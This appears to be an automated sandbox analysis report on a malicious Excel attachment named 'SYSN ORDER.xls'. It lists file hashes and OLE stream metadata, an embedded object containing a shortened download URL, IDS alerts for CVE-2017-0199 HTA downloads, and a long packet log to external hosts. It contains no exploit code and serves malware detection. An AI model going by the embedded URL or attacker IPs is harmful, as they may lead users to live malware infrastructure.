                                                                                  MD5:E6830E17A424B514F781DA7FC2D8D14E
                                                                                  SHA1:A7FE435B195335FBA03E9C9DDD393C475172E175
                                                                                  SHA-256:802598A7AE615A2B92E663CA5C388E2B1B9027A3A6E8F656629192861B00F49C
                                                                                  SHA-512:6CEB02CA3D36D633AC1236BB54D8E0C973E4CEF49F2A7655A269CA59C1C2E97DDC3FB2F1784DFA146A5C81968E94C4611A06A1C60CE4847646CAB1259CFCE933
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):647168
                                                                                  Entropy (8bit):7.982778814255626
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:O6JQtKmKXORstzDc6LYa3Kyq1mnHY0fNsRctTaMqsgtcc:xJ6KpXXYjgnHYcraMqsUd
                                                                                  MD5:E6830E17A424B514F781DA7FC2D8D14E
                                                                                  SHA1:A7FE435B195335FBA03E9C9DDD393C475172E175
                                                                                  SHA-256:802598A7AE615A2B92E663CA5C388E2B1B9027A3A6E8F656629192861B00F49C
                                                                                  SHA-512:6CEB02CA3D36D633AC1236BB54D8E0C973E4CEF49F2A7655A269CA59C1C2E97DDC3FB2F1784DFA146A5C81968E94C4611A06A1C60CE4847646CAB1259CFCE933
                                                                                  Malicious:true
                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:41:41 2024, Security: 1
                                                                                  Entropy (8bit):7.9645568514989975
                                                                                  TrID:
                                                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                  File name:SYSN ORDER.xls
                                                                                  File size:656'896 bytes
                                                                                  MD5:673bd0aa988ca4a1ef05edb3d5b68d60
                                                                                  SHA1:4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
                                                                                  SHA256:9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
                                                                                  SHA512:0af25507fd68eb9e8a9df4b1a93f6fad31429d0c0d37d326482ace999f5859f18ef3521c7e71146f41afcf45e7bbaf0d1d77543cc8abfb9c38ac2057cca9929c
                                                                                  SSDEEP:12288:GOyBFRSc/ol3o3+io8tM7qgSwaY0c6bde1bmnyqkZH1:GTBShxE+iokM7qgadcgdwmlkZ
                                                                                  TLSH:20D4231A71C5DF3BC2052ABE4AC4C19E491EFCA5EF68914BBAC0739D35B8FF11502686
                                                                                  Icon Hash:276ea3a6a6b7bfbf
                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1
                                                                                  Has Summary Info:
                                                                                  Application Name:Microsoft Excel
                                                                                  Encrypted Document:True
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:True
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:False
                                                                                  Flash Objects Count:0
                                                                                  Contains VBA Macros:True
                                                                                  Code Page:1252
                                                                                  Author:
                                                                                  Last Saved By:
                                                                                  Create Time:2006-09-16 00:00:00
                                                                                  Last Saved Time:2024-09-30 01:41:41
                                                                                  Creating Application:Microsoft Excel
                                                                                  Security:1
                                                                                  Document Code Page:1252
                                                                                  Thumbnail Scaling Desired:False
                                                                                  Contains Dirty Links:False
                                                                                  Shared Document:False
                                                                                  Changed Hyperlinks:False
                                                                                  Application Version:786432
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                  VBA File Name:Sheet1.cls
                                                                                  Stream Size:977
                                                                                  Attribute VB_Name = "Sheet1"
                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True
                                                                                  

                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                  VBA File Name:Sheet2.cls
                                                                                  Stream Size:977
                                                                                  Attribute VB_Name = "Sheet2"
                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True
                                                                                  

                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                  VBA File Name:Sheet3.cls
                                                                                  Stream Size:977
                                                                                  Attribute VB_Name = "Sheet3"
                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True
                                                                                  

                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                  Stream Size:985
                                                                                  Attribute VB_Name = "ThisWorkbook"
                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                  Attribute VB_Creatable = False
                                                                                  Attribute VB_PredeclaredId = True
                                                                                  Attribute VB_Exposed = True
                                                                                  Attribute VB_TemplateDerived = False
                                                                                  Attribute VB_Customizable = True
                                                                                  

                                                                                  General
                                                                                  Stream Path:\x1CompObj
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:114
                                                                                  Entropy:4.25248375192737
                                                                                  Base64 Encoded:True
                                                                                  General
                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:244
                                                                                  Entropy:2.889430592781307
                                                                                  Base64 Encoded:False
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:200
                                                                                  Entropy:3.278293668191049
                                                                                  Base64 Encoded:False
                                                                                  General
                                                                                  Stream Path:MBD001B973F/\x1CompObj
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:99
                                                                                  Entropy:3.631242196770981
                                                                                  Base64 Encoded:False
                                                                                  General
                                                                                  Stream Path:MBD001B973F/Package
                                                                                  CLSID:
                                                                                  File Type:Microsoft Excel 2007+
                                                                                  Stream Size:27478
                                                                                  Entropy:7.767256957232999
                                                                                  Base64 Encoded:True
                                                                                  General
                                                                                  Stream Path:MBD001B9740/\x1Ole
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:660
                                                                                  Entropy:4.534937071919144
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . ] 6 . w . . . . . . . . . . . . V . . . y . . . K . R . . . h . t . t . p . s . : . / . / . o . g . 1 . . . i . n . / . c . I . P . 5 . a . 8 . . . m . . i B . . I e . F . / G Q C ' . , " Y . . . . . . . . . . . . . . . . . . . a . F . E . d . i . j . Z . u . l . a . w . Z . Y . S . k . s . O . Q . l . K . C . U . W . x . j . d . w . U . o . A . 4 . h . 2 . G . p . Y . R . Q . l . Y . T . P . B . A . 2 . 4 . Y . D . i . s . F . 2 . Z . W . 9 . A . P . J . j . M . j . V . s . D . 7 . I . n . A . f
                                                                                  General
                                                                                  Stream Path:Workbook
                                                                                  CLSID:
                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                  Stream Size:609348
                                                                                  Entropy:7.999431010598352
                                                                                  Base64 Encoded:True
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                  CLSID:
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Stream Size:525
                                                                                  Entropy:5.293222590234424
                                                                                  Base64 Encoded:True
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:104
                                                                                  Entropy:3.0488640812019017
                                                                                  Base64 Encoded:False
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:2644
                                                                                  Entropy:3.9783776774947524
                                                                                  Base64 Encoded:False
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:553
                                                                                  Entropy:6.356033914304728
                                                                                  Base64 Encoded:True
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-30T10:12:20.038629+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 172.245.123.6 | 80 | TCP |
| 2024-09-30T10:12:20.043508+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.245.123.6 | 80 | 192.168.2.22 | 49164 | TCP |
| 2024-09-30T10:12:22.720603+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 172.245.123.6 | 80 | TCP |
| 2024-09-30T10:12:22.720605+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.245.123.6 | 80 | 192.168.2.22 | 49166 | TCP |
| 2024-09-30T10:12:44.169207+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49172 | 172.245.123.6 | 80 | TCP |
| 2024-09-30T10:12:48.103213+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49173 | 193.122.130.0 | 80 | TCP |
| 2024-09-30T10:12:49.716717+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49173 | 193.122.130.0 | 80 | TCP |
| 2024-09-30T10:12:50.120555+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49175 | 188.114.96.3 | 443 | TCP |
| 2024-09-30T10:12:51.550829+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49176 | 132.226.8.169 | 80 | TCP |
| 2024-09-30T10:12:52.906975+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49178 | 132.226.247.73 | 80 | TCP |
| 2024-09-30T10:12:53.392220+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49179 | 188.114.97.3 | 443 | TCP |
| 2024-09-30T10:13:00.977373+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49187 | 193.122.6.168 | 80 | TCP |
| 2024-09-30T10:13:01.037486+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49188 | 188.114.96.3 | 443 | TCP |
| 2024-09-30T10:13:02.049650+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49187 | 193.122.6.168 | 80 | TCP |
| 2024-09-30T10:13:02.434337+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49190 | 188.114.96.3 | 443 | TCP |
| 2024-09-30T10:13:03.528766+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49191 | 193.122.130.0 | 80 | TCP |
| 2024-09-30T10:13:07.171691+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49196 | 188.114.97.3 | 443 | TCP |
| 2024-09-30T10:13:09.823366+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49200 | 188.114.97.3 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Sep 30, 2024 10:12:20.131237984 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.131241083 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131253004 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131282091 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.131290913 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131302118 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.131335974 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.132106066 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.132147074 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.133702040 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.133748055 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.133775949 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.133817911 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219364882 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219393015 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219413996 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219425917 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219429016 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219436884 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219449043 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219449997 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219449997 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219460011 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219470024 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219470978 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219482899 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219484091 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219506025 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219511986 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219517946 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219521999 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219532967 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219543934 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.219544888 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219557047 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219568968 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.219585896 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220058918 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220069885 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220081091 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220104933 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220105886 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220110893 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220117092 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220128059 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220139980 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220149040 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220161915 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220179081 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220240116 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220249891 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220264912 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220284939 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220299006 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220767021 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220778942 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220788956 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220822096 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220824003 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220835924 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220835924 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220848083 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220863104 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220865011 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220870972 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220881939 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220901966 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220928907 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220940113 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220956087 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220967054 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.220972061 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.220987082 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.221004009 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.221534967 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.221577883 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.221962929 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.222006083 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.436641932 CEST8049164172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.436733961 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.502341986 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.502382994 CEST4916480192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:20.532964945 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:20.532994032 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.533062935 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:20.734067917 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:20.734097004 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.211604118 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.211664915 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.271962881 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.271996975 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.272322893 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:21.272396088 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.366480112 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:21.411401987 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.213360071 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.213438988 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.213536024 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:22.213557005 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:22.214970112 CEST49165443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:22.214984894 CEST44349165172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.229070902 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.234270096 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.235204935 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.235387087 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.240098000 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720527887 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720546007 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720561028 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720572948 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720583916 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720593929 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720602989 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720604897 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720616102 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720628977 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720630884 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720630884 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720642090 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.720643044 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720650911 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720669985 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.720681906 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.725541115 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.725554943 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.725567102 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.725595951 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.725756884 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.727622986 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.810959101 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.810972929 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.810982943 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.810992956 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811002970 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811162949 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811162949 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811315060 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811326981 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811336994 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811364889 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811388969 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811400890 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811417103 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812338114 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812350035 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812361002 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812377930 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812387943 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812390089 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812400103 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812400103 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812408924 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812422991 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812434912 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813307047 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813318014 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813328028 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813364029 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813371897 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813374996 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813385963 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813396931 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813419104 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813431025 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.816018105 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.819081068 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901597023 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901612043 CEST8049166172.245.123.6192.168.2.22
